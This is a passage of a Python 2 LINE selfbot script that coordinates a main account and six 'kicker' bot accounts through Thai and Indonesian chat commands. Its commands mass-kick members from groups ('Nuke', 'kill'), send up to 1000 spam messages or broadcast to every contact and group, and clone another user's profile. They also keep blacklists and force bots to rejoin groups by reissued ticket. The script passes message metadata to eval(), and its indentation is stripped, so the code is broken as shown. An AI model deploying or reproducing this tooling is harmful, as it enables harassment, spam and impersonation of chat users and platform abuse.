msg.text = None
cl.sendMessage(msg)
elif msg.text in ["2ของขวัญ","t2gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki2.sendMessage(msg)
elif msg.text in ["3ของขวัญ","t3gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["4ของขวัญ","t4gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
ki4.sendMessage(msg)
elif ("ชื่อกลุ่ม: " in msg.text):
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.name = msg.text.replace("ชื่อกลุ่ม: ","")
ki.updateGroup(group)
else:
cl.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok👈")
elif ("Gn " in msg.text):
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.name = msg.text.replace("Gn ","")
cl.updateGroup(group)
else:
cl.sendText(msg.to,"ได้ทำการเปลี่ยนชื่อเรียบร้อยแล้ว\n ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif "ลิ้งค์+" in msg.text:
if msg.toType == 2:
gid = msg.text.replace("gurl+","")
gurl = cl.reissueGroupTicket(gid)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
cl.sendText(msg.to,"ลิ้งค์ของกลุ่ม By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif "2ลิ้งค์กลุ่ม" in msg.text:
if msg.toType == 1:
tid = msg.text.replace("gurl","")
turl = ki.getUserTicket(tid)
ki.sendText(msg.to,"line://ti/p" + turl)
else:
ki.sendText(msg.to,"error")
elif "1ลิ้งค์กลุ่ม" in msg.text:
if msg.toType == 2:
gid = msg.text.replace("gurl","")
gurl = cl.reissueGroupTicket(gid)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
cl.sendText(msg.to,"ลิ้งค์กลุ่มปิดอยู่ \n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text.lower() == 'ชื่อเวลาเปิด':
if wait["clock"] == True:
cl.sendText(msg.to,"Sudah On")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"เแิดชื่อ+เวลาเรียบร้อย by. ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text.lower() == 'ชื่อวลาปิด':
if wait["clock"] == False:
cl.sendText(msg.to,"ปิดเวลาในชื่อ \n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["clock"] = False
cl.sendText(msg.to,"ปิดอยู่")
elif "ตั้งเวลา:" in msg.text:
n = msg.text.replace("ตั้งเวลา:","")
if len(n.decode("utf-8")) > 30:
cl.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
cl.sendText(msg.to," ༺ πနးຫຮี่のีধ์͜͡ ༻\n\n" + n)
elif msg.text.lower() == 'update':
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Diperbarui👈")
else:
cl.sendText(msg.to,"Silahkan Aktifkan Nama")
elif msg.text in ["url","Url"]:
if msg.toType == 2:
g = cl.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
cl.updateGroup(g)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["lลบรัน"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"ลบห้องเชิญเรียบร้อยแล้ว \nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["2ลบรัน"]:
gid = ki.getGroupIdsInvited()
for i in gid:
ki.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"ลบห้องเชิญเรียบร้อยแล้ว\n By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
ki.sendText(msg.to,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["3ลบรัน"]:
gid = ki2.getGroupIdsInvited()
for i in gid:
ki2.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki2.sendText(msg.to,"ลบห้องเชิญเรียบร้อยแล้ว\n By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
ki2.sendText(msg.to,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["4ลบรัน"]:
gid = ki3.getGroupIdsInvited()
for i in gid:
ki3.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki3.sendText(msg.to,"ลบห้องเชิญเรียบร้อยแล้ว\n By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
ki3.sendText(msg.to,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["5ลบรัน"]:
gid = ki4.getGroupIdsInvited()
for i in gid:
ki4.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki4.sendText(msg.to,"ลบห้องเชิญเรียบร้อยแล้ว\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
ki4.sendText(msg.to,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["6ลบรัน"]:
gid = ki5.getGroupIdsInvited()
for i in gid:
ki5.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki5.sendText(msg.to,"ลบห้องเชิญเรียบร้อยแล้ว\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
ki5.sendText(msg.to,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["7ลบรัน"]:
gid = ki6.getGroupIdsInvited()
for i in gid:
ki6.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki6.sendText(msg.to,"ลบห้องเชิญเรียบร้อยแล้ว\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
ki6.sendText(msg.to,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["ลบแชท","ล้างแชท"]:
cl.removeAllMessages(op.param2)
cl.sendText(msg.to,"ลบแชทเรียบร้อย\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
#-----------------------------------------------------------
elif msg.text in ["ลบแชทบอท","ล้างแชทบอท"]:
ki.removeAllMessages(op.param2)
ki2.removeAllMessages(op.param2)
ki3.removeAllMessages(op.param2)
ki4.removeAllMessages(op.param2)
ki5.removeAllMessages(op.param2)
ki6.removeAllMessages(op.param2)
cl.sendText(msg.to,"❇️Delete Chat Bot❇️")
cl.sendText(msg.to,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻\nได้ลบแชทBot 6Kicker เรียบร้อย")
elif msg.text in ["ยกเลิกเชิญ","Cancel dong","B cancel"]:
if msg.toType == 2:
group = ki.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
ki.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No invites👈")
else:
cl.sendText(msg.to,"Invite people inside not👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan")
else:
cl.sendText(msg.to,"invitan tidak ada")
elif msg.text in ["Cancel","cancel"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ไม่มีการเชิญ\n By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"ยกเลิกเรียบร้อย\n By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan👈")
else:
cl.sendText(msg.to,"invitan tidak ada")
elif "Group cancel:" in msg.text:
try:
strnum = msg.text.replace("Group cancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดระบบกินห้องรัน\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"ปิดระบบกินห้องรัน\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "เปิดระบบกินห้องรัน\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,strnum + "เปิดระบบกินห้องรัน\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Nilai tidak benar👈")
else:
cl.sendText(msg.to,"Weird value🛡")
elif msg.text in ["เช็คกลุ่ม","Glist"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[⭐] %s \n" % (cl.getGroup(i).name + " Members : " + str(len (cl.getGroup(i).members)))
cl.sendText(msg.to, "☆รายการกลุ่ม☆\n"+ h +"จำนวนกลุ่ม " +str(len(gid)))
elif msg.text.lower() == 'เช็คidกลุ่ม':
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif "รายละเอียดกลุ่ม" == msg.text:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[Nama]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nAnggota:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
elif "[Auto] " in msg.text:
msg.contentType = 13
_name = msg.text.replace("[Auto] ","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
elif "☜ʕ•ﻌ•ʔ " in msg.text:
msg.contentType = 13
_name = msg.text.replace("☜ʕ•ﻌ•ʔ ","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
elif msg.text in ["Group cancelall"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"บกเลิกห้องทั้งหมดแล้ว\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif ("ดำ " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned")
except:
pass
elif "ขาว @" in msg.text:
if msg.toType == 2:
print "[Unban]ok"
_name = msg.text.replace("ขาว @","")
_nametarget = _name.rstrip()
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif "ดำ1:" in msg.text:
nk0 = msg.text.replace("ดำ1:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Locked")
except:
cl.sendText(msg.to,"Error")
elif "ขาว:" in msg.text:
nk0 = msg.text.replace("ขาว:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif msg.text in ["ดำคท"]:
wait["wblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["ขาวคท"]:
wait["dblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text.lower() == 'เช็คดำ':
if wait["blacklist"] == {}:
cl.sendText(msg.to," Nothing in the blacklist")
else:
cl.sendText(msg.to," following is a blacklist")
mc = ""
for mi_d in wait["blacklist"]:
mc += "�" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'banlist':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += "�" +cl.getContact(mm).displayName + "\n"
cl.sendText(msg.to,cocoa + "Daftar Hitam")
elif msg.text in ["Cb","ล้างดำ"]:
wait["blacklist"] = {}
cl.sendText(msg.to,"clear")
elif msg.text in ["Com Bl"]:
wait["wblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklistô€œô€…”👈")
elif msg.text in ["Com hapus Bl"]:
wait["dblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklistô€œô€…”👈")
elif msg.text in ["Com Bl cek"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"Nothing in the blacklistô€œ🛡")
else:
cl.sendText(msg.to,"The following is a blacklistô€œ👈")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mban:" in msg.text:
midd = msg.text.replace("Mban:","")
wait["blacklist"][midd] = True
cl.sendText(msg.to,"Target Lock")
elif msg.text in ["Banlistall","Mcheck"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Nothing double thumbs up")
else:
cl.sendText(msg.to,"Daftar Banlist")
mc = "[⎈]Blacklist [⎈]\n"
for mi_d in wait["blacklist"]:
mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
cl.sendText(msg.to, mc + "")
elif msg.text in ["Me ban","Cekban","Mcheck mid"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = "[⎈]Mid Blacklist [⎈]"
for mm in matched_list:
cocoa += "\n" + mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text in ["Conban","ข้อมูลบัญชีดำ","Contact ban"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = cl.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
cl.sendMessage(M)
elif msg.text.lower() == 'kill':
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"Daftar hitam pengguna tidak memiliki")
return
for jj in matched_list:
try:
cl.kickoutFromGroup(msg.to,[jj])
ki.kickoutFromGroup(msg.to,[jj])
ki2.kickoutFromGroup(msg.to,[jj])
ki3.kickoutFromGroup(msg.to,[jj])
ki4.kickoutFromGroup(msg.to,[jj])
ki5.kickoutFromGroup(msg.to,[jj])
ki6.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif msg.text.lower() == 'blocklist':
blockedlist = cl.getBlockedContactIds()
cl.sendText(msg.to, "Please wait...")
kontak = cl.getContacts(blockedlist)
num=1
msgs="User Blocked List\n"
for ids in kontak:
msgs+="\n%i. %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n\nTotal %i blocked user(s)" % len(kontak)
cl.sendText(msg.to, msgs)
elif "Nk " in msg.text:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki3.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki3.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
elif "Nuke" in msg.text:
if msg.toType == 2:
print "Nuke ok"
_name = msg.text.replace("Nuke","")
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
gs = ki5.getGroup(msg.to)
gs = ki6.getGroup(msg.to)
start = time.time()
ki.sendText(msg.to, "Nuke Speed")
elapsed_time = time.time() - start
ki2.sendText(msg.to, "%sseconds" % (elapsed_time))
ki3.sendText(msg.to, "Nuke Start")
ki4.sendText(msg.to, "Nuke Proses")
ki5.sendText(msg.to," See You Bitch ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
ki6.sendText(msg.to,"Not found.")
else:
for target in targets:
if not target in Bots:
try:
klist=[ki,ki2,ki3,ki4,ki5,ki6]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg,to,"Nuke Finish")
ki1.sendText(msg,to,"Nuke Succes Bos")
elif ("Bunuh " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif ("Telan " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki.kickoutFromGroup(msg.to,[target])
except:
ki.sendText(msg.to,"Error")
elif ("Cek " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendText(msg.to,"Mid:" + key1)
elif "Beb " in msg.text:
nk0 = msg.text.replace("Beb ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Good Bye")
elif ("Bye " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
except:
pass
elif "Cbroadcast " in msg.text:
bctxt = msg.text.replace("Cbroadcast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Gbroadcast " in msg.text:
bctxt = msg.text.replace("Gbroadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt))
elif msg.text == "เช็คอ่าน":
cl.sendText(msg.to, "เปิดระบบเช็คคนอ่าน\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "อ่าน":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to,"======ชื่อคนอ่าน====== %s\n=====ชื่อคนอ่าน======\n%s\nเวลาอ่าน \n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to,"กรุณาสั่งเช็คอ่านและสั่งอ่านใหม่ \n By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif "tag all" == msg.text.lower():
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
summon(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, len(nama)-1):
nm2 += [nama[j]]
summon(msg.to, nm2)
if jml > 200 and jml < 500:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, 199):
nm2 += [nama[j]]
summon(msg.to, nm2)
for k in range(200, 299):
nm3 += [nama[k]]
summon(msg.to, nm3)
for l in range(300, 399):
nm4 += [nama[l]]
summon(msg.to, nm4)
for m in range(400, len(nama)-1):
nm5 += [nama[m]]
summon(msg.to, nm5)
if jml > 500:
print "Terlalu Banyak Men 500+"
cnt = Message()
cnt.text = "จำนวนที่ีแท็ก \n" + str(jml) + " คน \n By . ༺ πနးຫຮี่のีধ์͜͡ ༻"
cnt.to = msg.to
cl.sendMessage(cnt)
elif "มอง" in msg.text:
group = cl.getGroup(msg.to)
k = len(group.members)//100
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*100 : (j+1)*100]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += "@Krampus\n"
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
cl.sendMessage(msg)
elif "Spam " in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
text = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (text+"\n")
if txt[1] == "on":
if jmlh <= 1000:
for x in range(jmlh):
cl.sendText(msg.to, text)
else:
cl.sendText(msg.to, "Out Of Range!")
elif txt[1] == "off":
if jmlh <= 1000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out Of Range!")
elif "[Auto Respond]" in msg.text:
cl.sendImageWithUrl(msg.to, "http://dl.profile.line.naver.jp/0hlGvN3GXvM2hLNx8goPtMP3dyPQU8GSIgJVUpCTpiPVtiA3M2clJ-C2hia11mUn04cAJ-DWljOVBj")
elif "Fancytext: " in msg.text:
txt = msg.text.replace("Fancytext: ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Tx: " in msg.text:
txt = msg.text.replace("Tx: ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif msg.text in ["Kembali","backup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Telah kembali semula")
except Exception as e:
cl.sendText(msg.to, str(e))
elif "Copy @" in msg.text:
if msg.toType == 2:
print "[COPY] Ok"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
sendMessage(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.cloneContactProfile(target)
except Exception as e:
print e
elif msg.text in ["Name me","Men"]:
G = cl.getProfile()
X = G.displayName
cl.sendText(msg.to,X)
elif "siri " in msg.text.lower():
query = msg.text.lower().replace("siri ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "siri:" in msg.text.lower():
query = msg.text.lower().replace("siri:","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "siri-en " in msg.text.lower():
query = msg.text.lower().replace("siri-en ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'en', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif msg.text == ".11":
cl.sendText(msg.to, "มีใครอยู่ไหม…… !?")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('📅%d-%m-%Y ⏰%H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "คนอ่าน":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "╔═════════════════%s\n╠═════════════════\n%s╠═════════════════\n║Readig point creation:\n║ [%s]\n╚══════════════════" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "กรุณาพิมเช็คอ่านใหม่ \nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text.lower() == 'cancel':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled👈")
elif "#leave" in msg.text:
try:
import sys
sys.exit()
except:
pass
if op.type == 19:
try:
if op.param3 in mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
ki.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
